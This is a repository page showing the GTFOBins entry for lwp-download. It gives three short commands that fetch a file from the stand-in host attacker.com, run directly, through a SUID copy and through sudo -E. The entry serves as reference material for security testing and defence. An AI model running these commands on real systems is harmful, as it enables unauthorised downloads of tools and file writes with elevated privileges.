This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
ece99d296975b92b29f7bfde60f6b72d7326a164
GTFOBins.github.io
/
_gtfobins
/
lwp-download.md
Andrea Cardaci
ec91e7b417
Improve lwp-download
2020-03-17 20:41:52 +01:00
478 B
Raw
Blame
History
description, functions
description
functions
Fetch a remote file via HTTP GET request.
file-download
suid
sudo
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save lwp-download $URL $LFILE
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save ./lwp-download $URL $LFILE
code
URL=
http://attacker.com/file_to_get
export LFILE=file_to_save sudo -E lwp-download $URL $LFILE
Reference in New Issue
View Git Blame
Copy Permalink